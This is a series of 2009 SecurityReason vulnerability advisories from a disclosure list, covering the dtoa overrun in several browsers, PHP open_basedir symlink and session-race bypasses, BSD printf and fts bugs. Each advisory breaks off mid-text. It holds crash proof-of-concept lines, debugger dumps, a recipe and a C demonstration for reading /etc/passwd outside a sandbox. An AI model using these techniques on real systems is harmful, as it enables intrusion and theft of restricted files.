US-CERT declared that it would inform all vendors about this issue; however, they did not do it. Even greater confusion was caused by the new CVE number "CVE-2009-1563". Secunia reported that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products (KDE, Chrome) and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation Security Advisory (http://www.mozilla.org/security/announce/2009/mfsa2009-59.html) was updated with the note: "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)". This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We publish all the individual advisories to formally show all vulnerable software and to avoid the wrong CVE number. We do not see any other way to fix this issue in all products.

--- 4. Fix ---

NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
htt
[Full-disclosure] SecurityReason: Opera 10.01 Remote Array Overrun (Arbitrary code execution)
[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- Opera 10.01
- Opera 10.10 Beta

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/73

--- 0. Description ---

Opera is a Web browser and Internet suite developed by the Opera Software company. The browser handles common Internet-related tasks such as displaying Web sites, sending and receiving e-mail messages, managing contacts, IRC online chatting, downloading files via BitTorrent, and reading Web feeds. Opera is offered free of charge for personal computers and mobile phones.

--- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---

The main problem exists in the dtoa implementation. Opera has a dtoa algorithm very similar to the one in the BSDs, Chrome and the Mozilla products. It is the same issue as SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of any length, and parsing it overwrites memory. Kmax is defined as 15, so the freelist array has Kmax+1 = 16 entries (indices 0 to 15). The dtoa functions do not check the Kmax limit, so a long enough number makes them access freelist elements at index 16 and above.

--- 2. Proof of Concept (PoC) ---

---
var a=0.<?php echo str_repeat("9",29); ?>;
---

If we use Opera to view this PoC, Opera crashes. For example:

---
var a=0.<?php echo str_repeat("1",296450); ?>;
---

OPERA-CRASHLOG V1 desktop 10.01 1844 windows
Opera.exe 1844 caused exception C005 at address 67956906 (Base: 40)

Registers:
EAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=4200 ESI=C20471EC EDI=
EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=

FPU stack:
C020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800
3FC78000 1001 0BBE0004 2EBA804E2FDE SW=0122 CW=027F

127# gdb -q opera opera.core
...
Program terminated with signal 11, Segmentation fault.
#0  0x2960307b in ?? ()
...
(gdb) i r
eax            0x71c71c71 1908874353
ecx            0x2aa03be4 715144164
edx            0x0        0
ebx            0x296177f8 694253560
esp            0xbfbfb650 0xbfbfb650
ebp            0xbfbfb698 0xbfbfb698
esi            0x2962d000 694341632
edi            0x0        0
eip            0x2960307b 0x2960307b
...
(gdb) x/100x ($esi)-90
0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0x2962cff6: 0xc71c71c7 0x71c71c71
Cannot access memory at address 0x2962cffe
...

--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed.

US-CERT declared that it would inform all vendors about this issue; however, they did not do it. Even greater confusion was caused by the new CVE number "CVE-2009-1563". Secunia reported that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products (KDE, Chrome) and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation Security Advisory (http://www.mozilla.org/security/announce/2009/mfsa2009-59.html) was updated with the note: "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)". This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We publish all the individual advisories to formally show all vulnerable software and to avoid the wrong CVE number. We do not see any other way to fix this issue in all products.

--- 4. Fix ---

Opera fix:
The vulnerability was fixed in the latest release candidate, Opera RC3:
http://snapshot.opera.com/windows/Opera_1010_1890_in.exe
The final Opera version with the fix can be expected shortly.

NetBSD fix (optimal):
http://cvsweb.netbsd.org/b
[Full-disclosure] SecurityReason: K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution)
[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- K-Meleon 1.5.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/72

--- 0. Description ---

K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout engine developed by Mozilla, which is also used by Firefox. K-Meleon is free, open source software released under the GNU General Public License and is designed specifically for Microsoft Windows (Win32) operating systems.

--- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---

The main problem exists in the dtoa implementation. K-Meleon has the same dtoa as KDE, Opera and all BSD systems. This issue has been fixed in Firefox 3.5.4. It is the same issue as SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of any length, and parsing it overwrites memory. Kmax is defined as 15, so the freelist array has Kmax+1 = 16 entries (indices 0 to 15). The dtoa functions do not check the Kmax limit, so a long enough number makes them access freelist elements at index 16 and above.

--- 2. Proof of Concept (PoC) ---

---
var a=0.<?php echo str_repeat("1",296450); ?>;
---

K-Meleon crashes with:

Unhandled exception at 0x01800754 in k-meleon.exe: 0xC005: Access violation reading location 0x0bc576ec.
01800754  mov eax,dword ptr [ecx]
EAX 0002
ECX 0BC576EC
EDI 028FEB51

--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed.

US-CERT declared that it would inform all vendors about this issue; however, they did not do it. Even greater confusion was caused by the new CVE number "CVE-2009-1563". Secunia reported that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products (KDE, Chrome) and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation Security Advisory (http://www.mozilla.org/security/announce/2009/mfsa2009-59.html) was updated with the note: "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)". This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We publish all the individual advisories to formally show all vulnerable software and to avoid the wrong CVE number. We do not see any other way to fix this issue in all products.

Please note: the patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa algorithm is not optimal and allows a remote Denial of Service in Firefox 3.5.5 when given a long float number.

--- 4. Fix ---

NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://w
[Full-disclosure] SecurityReason: SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution)
[ SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- SeaMonkey 1.1.18

Fixed in:
- SeaMonkey 2.0

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/71

--- 0. Description ---

The SeaMonkey project is a community effort to develop the SeaMonkey all-in-one internet application suite (see below). Such a software suite was previously made popular by Netscape and Mozilla, and the SeaMonkey project continues to develop and deliver high-quality updates to this concept. Containing an Internet browser, email & newsgroup client with an included web feed reader, HTML editor, IRC chat and web development tools, SeaMonkey is sure to appeal to advanced users, web developers and corporate users.

--- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code execution) ---

The main problem exists in the dtoa implementation. SeaMonkey has the same dtoa as KDE, Opera and all BSD systems. This issue has been fixed in Firefox 3.5.4, and the fix
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42
has been used to patch SeaMonkey 2.0. This flaw was detected in May 2009 and designated SREASONRES:20090625,
http://securityreason.com/achievement_securityalert/63
but the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of any length, and parsing it overwrites memory. Kmax is defined as 15, so the freelist array has Kmax+1 = 16 entries (indices 0 to 15). The dtoa functions do not check the Kmax limit, so a long enough number makes them access freelist elements at index 16 and above.

--- 2. Proof of Concept (PoC) ---

---
var a=0.<?php echo str_repeat("9",29); ?>;
---

If we use SeaMonkey to view this PoC, SeaMonkey crashes. For example:

---
var a=0.<?php echo str_repeat("1",296450); ?>;
---

127# gdb seamonkey-bin seamonkey-bin.core
...
#0  0x28df0ecb in ?? ()
...
(gdb) i r
eax            0x0        0
ecx            0x2        2
edx            0xbfbfd2fc -1077947652
ebx            0x28da9b6c 685415276
esp            0xbfbfd2ac 0xbfbfd2ac
ebp            0xbfbfd2c8 0xbfbfd2c8
esi            0xb        11
edi            0xb        11
eip            0x28df0ecb 0x28df0ecb
...
esi = edi = 11

--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed.

US-CERT declared that it would inform all vendors about this issue; however, they did not do it. Even greater confusion was caused by the new CVE number "CVE-2009-1563". Secunia reported that this vulnerability was only detected in Mozilla Firefox, but nobody was aware that the problem affects other products (KDE, Chrome) and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation Security Advisory (http://www.mozilla.org/security/announce/2009/mfsa2009-59.html) was updated with the note: "The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)". This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We publish all the individual advisories to formally show all vulnerable software and to avoid the wrong CVE number. We do not see any other way to fix this issue in all products.

Please note: the patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa algorithm is not optimal and allows a remote Denial of Service in Firefox 3.5.5 when given a long float number.

--- 4. Fix ---

NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/s
[Full-disclosure] PHP 5.2.11/5.3.0 Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ PHP 5.2.11/5.3.0 Multiple Vulnerabilities ]

Author: Maksymilian Arciemowicz
http://SecurityReason.com
Date:
- - Dis.: 01.10.2009
- - Pub.: 13.11.2009

Risk: Medium

Affected Software:
- - PHP 5.3.0
- - PHP 5.2.11

Original URL:
http://securityreason.com/achievement_securityalert/70

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

http://lu2.php.net/manual/en/function.symlink.php

symlink - Creates a symbolic link
bool symlink ( string $target , string $link )

- --- 1. PHP 5.2.11/5.3.0 Multiple Vulnerabilities ---
The first main problem exists in the open_basedir security model for symlinks. Paths like $target and $link are checked by open_basedir. We can bypass open_basedir, but the symlink() function itself is not affected; the issue is caused by a false security model designed by PHP.

example:

127# cat sym.php
127# php sym.php
PHP Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2

Warning: symlink(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/www) in /www/test/sym.php on line 2
127#

open_basedir will disallow /etc/passwd. Let`s see:

127# ls -la
total 8
drwxr-xr-x 2 www www 512 Oct 20 00:33 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
127# pwd
/www/test
127# cat kakao.php
127# php kakao.php
127# ls -la
total 12
drwxr-xr-x 4 www www 512 Oct 20 00:37 .
drwxr-xr-x 13 www www 1536 Oct 20 00:26 ..
drwxr-xr-x 4 www www 512 Oct 20 00:37 abc
lrwxr-xr-x 1 www www 27 Oct 20 00:37 exploit -> tmplink/../../../etc/passwd
- -rw-r--r-- 1 www www 356 Oct 20 00:32 kakao.php
- -rw-r--r-- 1 www www 45 Oct 20 00:26 sym.php
drwxr-xr-x 2 www www 512 Oct 20 00:37 tmplink
127# cat exploit
# passwd
#
root:*:0:0:god:/root:/bin/csh
...

Now "tmplink" is a directory, so the link "exploit" will be "../../etc/passwd". We don't need to bypass open_basedir; it is a design mistake. PHP will allow "tmplink/../../../etc/passwd" because ./tmplink/../../../etc/passwd really exists. So if we want to read another file, we need to create another structure.

example "/usr/pkg/etc/php.ini":

mkdir("usr");
chdir("usr");
mkdir("pkg");
chdir("pkg");
mkdir("etc");
chdir("etc");
mkdir("php.ini");
chdir("..");
chdir("..");
chdir("..");

PHP will confirm that tmplink/../../../usr/pkg/etc/php.ini really exists. Very important is removing the fake link "tmplink" and creating, in the same place, a directory with the same name.

unlink("tmplink");
mkdir("tmplink");

This is the main trick here, because "tmplink" (dir) is only -1 deep, not -4.

Under PHP 5.2.11 we can also bypass safe_mode. However, security setups such as running php under suphp with the privileges of the users also have their drawbacks. We can use our exploit to show this vulnerability. If httpd allows reading links (default), we can create a symlink to / (of course if we have access). If we can not read the symlink, we can use the next PHP flaw, "hazard syphon", to read other files.

example of php hazard (session) (open_basedir=/www):

script0 "/www/test/.htaccess":
php_value session.save_path "/www/test/notyetexists"

file /www/test/notyetexists doesn`t exist (current)

script1 "/www/test/sessrun.php"

now we have 60 sec to run script2

script2 "/www/test/runin60.php":

Hazard exists in PHP!

Plan of action:
0. Create .htaccess with 'session.save_path "/www/test/notyetexists"'.
1. Run script1, where the first phase (SAPI) will check privileges to /www/test/notyetexists. But this file or dir doesn't exist, so open_basedir will return false.
2. Script1 will generate a sleep signal with a 60 sec delay. In this moment, we need to run Script2. This script will create the link /www/test/notyetexists to /tmp or other directories.
3. Script1 after 60 sec will run the session_start() function, where privileges to /www/test/notyetexists aren't checked at this moment.

In result, we can use the function sleep() to create a fake delay, and the first issue can help create symlinks.

- --- 2. Exploit ---
open_basedir bypass:
http://securityreason.com/achievement_exploitalert/14

hazard analogy, as in this note

- --- 3. Fix ---
Fix not available

- --- 4. Greets ---
sp3x Infospec Chujwamwdupe p_e_a pi3

- --- 4. Contact ---
Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email: cxib {a.t] securi
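The symlink trick above, replayed in C as an added example (this is not code from the advisory or from PHP): path_within() models an open_basedir check as a realpath(3) prefix test, and demo_symlink_bypass() builds a throwaway tree under /tmp in which <tmp>/etc/passwd stands in for /etc/passwd. The check on the link target at creation time passes, because tmplink/../../../etc/passwd then resolves to abc/etc/passwd inside the base; after tmplink is replaced by a real directory the unchanged link text climbs out of the base, which the same check run on the link at open time detects. The function names, the /tmp/obd.XXXXXX template and the file contents are this example's own assumptions.

```c
#define _GNU_SOURCE
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Model of an open_basedir check: resolve both paths with realpath(3) and
 * require that `path` is `base` itself or lies below it, with a '/'
 * boundary so that base /www/test does not accept /www/test2.
 * Returns 1 if inside, 0 if outside or unresolvable. */
static int path_within(const char *base, const char *path)
{
	char rbase[PATH_MAX], rpath[PATH_MAX];
	if (!realpath(base, rbase) || !realpath(path, rpath))
		return 0;
	size_t n = strlen(rbase);
	if (n == 1 && rbase[0] == '/')          /* base "/" allows everything */
		return 1;
	return strncmp(rbase, rpath, n) == 0 && (rpath[n] == '/' || rpath[n] == '\0');
}

static int write_file(const char *path, const char *text)
{
	FILE *f = fopen(path, "w");
	if (!f)
		return -1;
	fputs(text, f);
	return fclose(f);
}

/* Replays the advisory's sequence in a fresh temporary tree (constructed
 * sample data; <tmp>/etc/passwd stands in for /etc/passwd). Returns 1 when
 * the link that passed the check at creation time later resolves outside
 * the base and the outside file can be read through it, 0 otherwise, -1 on
 * setup errors. The tree is left in place for inspection. */
static int demo_symlink_bypass(void)
{
	char tmp[] = "/tmp/obd.XXXXXX", base[PATH_MAX], p[PATH_MAX], line[128];
	if (!mkdtemp(tmp))
		return -1;
	snprintf(base, sizeof base, "%s/www/test", tmp);
	snprintf(p, sizeof p, "%s/etc", tmp);
	mkdir(p, 0700);
	snprintf(p, sizeof p, "%s/etc/passwd", tmp);
	write_file(p, "root:*:0:0:god:/root:/bin/csh\n");   /* the "outside" file */
	snprintf(p, sizeof p, "%s/www", tmp);
	mkdir(p, 0700);
	mkdir(base, 0700);
	if (chdir(base) < 0)
		return -1;
	/* decoy structure inside the base: abc/a/b/c and abc/etc/passwd */
	mkdir("abc", 0700); mkdir("abc/a", 0700); mkdir("abc/a/b", 0700);
	mkdir("abc/a/b/c", 0700); mkdir("abc/etc", 0700);
	write_file("abc/etc/passwd", "decoy\n");
	/* 1. tmplink is a symlink three levels deep, so tmplink/../../../etc/passwd
	 *    resolves to abc/etc/passwd, inside the base: the check passes. */
	if (symlink("abc/a/b/c", "tmplink") < 0)
		return -1;
	int checked_ok = path_within(base, "tmplink/../../../etc/passwd");
	if (symlink("tmplink/../../../etc/passwd", "exploit") < 0)
		return -1;
	/* 2. Replace the symlink by a real directory of the same name. The link
	 *    text of "exploit" is unchanged, but tmplink/.. is now the base, so
	 *    ../../../ climb out of it. */
	unlink("tmplink");
	mkdir("tmplink", 0700);
	int still_ok = path_within(base, "exploit");   /* a check at open time */
	FILE *f = fopen("exploit", "r");              /* what open() really gets */
	if (!f)
		return -1;
	if (!fgets(line, sizeof line, f))
		line[0] = '\0';
	fclose(f);
	return checked_ok && !still_ok && strncmp(line, "root:", 5) == 0;
}

int main(void)
{
	int r = demo_symlink_bypass();
	printf("check passed at link creation, then read outside the base: %s\n",
	       r == 1 ? "yes" : "no");
	return r == 1 ? 0 : 1;
}
```

The point the model makes is that a path check is only as good as the moment it runs: any check done on the target string at symlink() time is void once the components it walked through can be swapped, so the resolved path has to be re-checked on the descriptor or path that is actually opened.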
[Full-disclosure] SecurityReason: Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 29.06.2009
- - Pub.: 30.10.2009

We are going to inform all vendors about this problem.

Affected Software (official):
- - OpenBSD 4.6
- - NetBSD 5.0.1

probably more (macosx, chrome, firefox,..)...

Original URL:
http://securityreason.com/achievement_securityalert/69

- --- 0.Description ---
printf(1) formats and prints its arguments, after the first, under control of the format. The format is a character string which contains three types of objects: plain characters, which are simply copied to standard output, character escape sequences which are converted and copied to the standard output, and format specifications, each of which causes printing of the next successive argument.

SYNOPSIS
printf format [arguments ...]

The printf(3) family of functions produces output according to a format as described below. The printf(3) and vprintf(3) functions write output to stdout, the standard output stream; fprintf(3) and vfprintf(3) write output to the given output stream; sprintf(3), snprintf(3), vsprintf(3), and vsnprintf(3) write to the character string str; and asprintf(3) and vasprintf(3) write to a dynamically allocated string that is stored in ret.

SYNOPSIS
int printf(const char * restrict format, ...);

- --- 1. Multiple BSD printf(1) and multiple dtoa/*printf(3) vulnerabilities ---
The first problem exists in usr.bin/printf/printf.c. printf(1) in NetBSD and OpenBSD has a problem with field width and precision. The difference between printf(1) and printf(3) is that printf(1) has its own filter for formatting fmt. To see the acceptable tags, use the manual "man 1 printf". We can use the char '*' in fmt to declare the size in the next arg.

example:
# printf %1.*f 1 1.2345
1.2

So, printf allows the use of "*" in fmt.

- ---
...
fieldwidth = *fmt == '*' ? getint() : 0;
...
- ---

The problem is that the program does not verify the accuracy of fmt. It is possible to use '*' a few times => the function getint() will be started a few times. getint() returns the value allocated in memory (function printf(3)).

example:
# printf %1.**f 1 1.2345
/* long exec. */

The precision here will be taken from the stack. This means that the precision is the number retrieved from the stack. Further addition of the '*' char will move the pointer of the precision. As a result, we try to appoint an offset to control the registers esi and edi. But to do this, we need to change the fmt type from float to string.

example (string):
# printf %*s 666
Memory fault (core dumped)

and we are in home. We need to add "*" to try to control the esi and edi registers.

# gdb -q printf
(no debugging symbols found)
(gdb) r "%*s" 666
Starting program: /usr/bin/printf "%*s" 666
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xbbba6a2a in __vfprintf_unlocked () from /usr/lib/libc.so.12
(gdb) i r
eax 0x0 0
ecx 0xffffffff -1
edx 0x0 0
ebx 0xbbbd5b38 -1145218248
esp 0xbfbfe320 0xbfbfe320
ebp 0xbfbfec08 0xbfbfec08
esi 0x29a 666
edi 0x29a 666

esi and edi are 666 (netbsd). Under openbsd we have randomization, so it will not be so easy.

- ---
727 size = p ? (p - cp) : prec;
728 } else {
729 size_t len;
730
731 if ((len = strlen(cp)) > INT_MAX)
732 goto overflow;
733 size = (int)len;
734 }
735 sign = '\0';
- ---

The program will crash at line 731 (strlen(cp)). The variable "cp" will be allocated at address 666 in memory. So we can try to manipulate the address of the "cp" variable. That means that the shells are also affected (like /bin/sh /bin/csh), because printf is also used as a shell built-in. We do not have accurate information on who uses a flawed implementation. printf(1) should use the "IEEE 1003.1-2001" standard.

The next problem with printf(3) is very similar to "Multiple Vendors libc/gdtoa printf(3) Array Overrun" (SREASONRES:20090625) and concerns the implementation of gdtoa. We can try to allocate a lot of memory, so that malloc will generate a crash. The issue has been detected in gdtoa from openbsd. The NetBSD fix for (SREASONRES:20090625) is not affected, and we think that it is better. Discrepancy theory divided netbsd and openbsd.

example:
# printf %.11f 1.1
Segmentation fault (core dumped)
...
(gdb) bt
#0 __Balloc_D2A (k=29) at /usr/src/lib/libc/gdtoa/misc.c:75
#1 0x
[Full-disclosure] libc:fts_*() Multiple Denial of Service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ libc:fts_*() Multiple Denial of Service ]

Author: Maksymilian Arciemowicz
SecurityReason.com
Date:
- - Dis.: 03.08.2009
- - Pub.: 02.10.2009

We are going to inform all vendors about this problem.

Affected Software (official):
- - OpenBSD 4.5 (fix available)
- - NetBSD 5.0.1 (fix available)

probably more...

Original URL:
http://securityreason.com/achievement_securityalert/68

- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies. The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions. The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy. The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.

typedef struct _ftsent {
	unsigned short fts_info;	/* flags for FTSENT structure */
	char *fts_accpath;		/* access path */
	char *fts_path;			/* root path */
	size_t fts_pathlen;		/* strlen(fts_path) */
	char *fts_name;			/* file name */
	size_t fts_namelen;		/* strlen(fts_name) */
	short fts_level;		/* depth (-1 to N) */
	int fts_errno;			/* file errno */
	long fts_number;		/* local numeric value */
	void *fts_pointer;		/* local address value */
	struct _ftsent *fts_parent;	/* parent directory */
	struct _ftsent *fts_link;	/* next file structure */
	struct _ftsent *fts_cycle;	/* cycle structure */
	struct stat *fts_statp;		/* stat(2) information */
} FTSENT;

- --- 1. libc:fts_*() Multiple Denial of Service ---
In March 2009, we reported an issue (SREASONRES:20090304) in libc (fts.c). Now we want to present the conclusions and show the usefulness of this vulnerability. The fix provided by the OpenBSD Team will protect us from the crash but, we think, not for all cases that are shown in this advisory.
Index: fts.c
===
RCS file: /cvs/src/lib/libc/gen/fts.c,v
retrieving revision 1.41
diff -u -p -r1.41 fts.c
- - --- fts.c 27 Dec 2008 12:30:13 - 1.41
+++ fts.c 10 Feb 2009 09:00:24 -
@@ -633,6 +633,14 @@ fts_build(FTS *sp, int type)
 len++;
 maxlen = sp->fts_pathlen - len;

+ if (cur->fts_level == SHRT_MAX) {
+ (void)closedir(dirp);
+ cur->fts_info = FTS_ERR;
+ SET(FTS_STOP);
+ errno = ENAMETOOLONG;
+ return (NULL);
+ }
+
 level = cur->fts_level + 1;

 /* Read the directory, attaching each entry to the `link' pointer. */

So let`s see /etc/rc.d/cleartmp (NetBSD 5.0.1). This script uses rm(1) with -rf args.

Line 40-41:
find -x . ! -name . ! -name lost+found ! -name quota.user \
! -name quota.group -exec rm -rf -- {} \; -type d -prune)

